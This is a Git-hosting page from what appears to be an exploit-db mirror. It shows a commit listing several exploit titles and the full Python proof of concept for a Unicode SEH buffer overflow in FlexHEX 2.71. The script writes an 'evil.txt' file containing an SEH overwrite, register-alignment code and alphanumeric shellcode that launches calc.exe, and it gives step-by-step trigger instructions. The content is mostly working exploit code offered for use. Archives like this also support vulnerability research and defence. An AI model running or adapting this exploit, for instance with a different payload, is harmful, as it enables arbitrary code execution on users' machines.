bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/46665.py
Offensive Security 23f668ca8d DB: 2019-04-09 
14 changes to exploits/shellcodes

FlexHEX 2.71 - SEH Buffer Overflow (Unicode)
AllPlayer 7.4 - SEH Buffer Overflow (Unicode)
River Past Cam Do 3.7.6 - 'Activation Code' Local Buffer Overflow
Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation

QNAP Netatalk < 3.1.12 - Authentication Bypass
Jobgator - 'experience' SQL Injection
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution
ShoreTel Connect ONSITE < 19.49.1500.0 - Multiple Vulnerabilities
SaLICru -SLC-20-cube3(5) - HTML Injection
CentOS Web Panel 0.9.8.793 (Free) / 0.9.8.753 (Pro) - Cross-Site Scripting
Tradebox CryptoCurrency - 'symbol' SQL Injection
WordPress Plugin Limit Login Attempts Reloaded 2.7.4 - Login Limit Bypass
ManageEngine ServiceDesk Plus 9.3 - User Enumeration
2019-04-09 05:02:03 +00:00

60 lines
No EOL
1.7 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python -w
#
# Exploit Author: Chris Au
# Exploit Title: FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
# Date: 06-04-2019
# Vulnerable Software: FlexHEX 2.71
# Vendor Homepage: http://www.flexhex.com
# Version: 2.71
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
# Tested Windows Windows XP SP3
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open FlexHEX Editor
# 3. select "Stream", click "New Stream..."
# 4. paste contents from clipboard in the "Stream Name:"
# 5. select OK
# 6. calc.exe
#
filename="evil.txt"
junk = "\xcc" * 276
nseh = "\x90\x45"
seh = "\xd5\x52" #pop pop retn
valign = (
"\x45" #align
"\x56" #push esi
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x1a\x11" #sub eax,11001a00
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\x45" * 94
#call calc.exe, bufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Reference in a new issue View git blame Copy permalink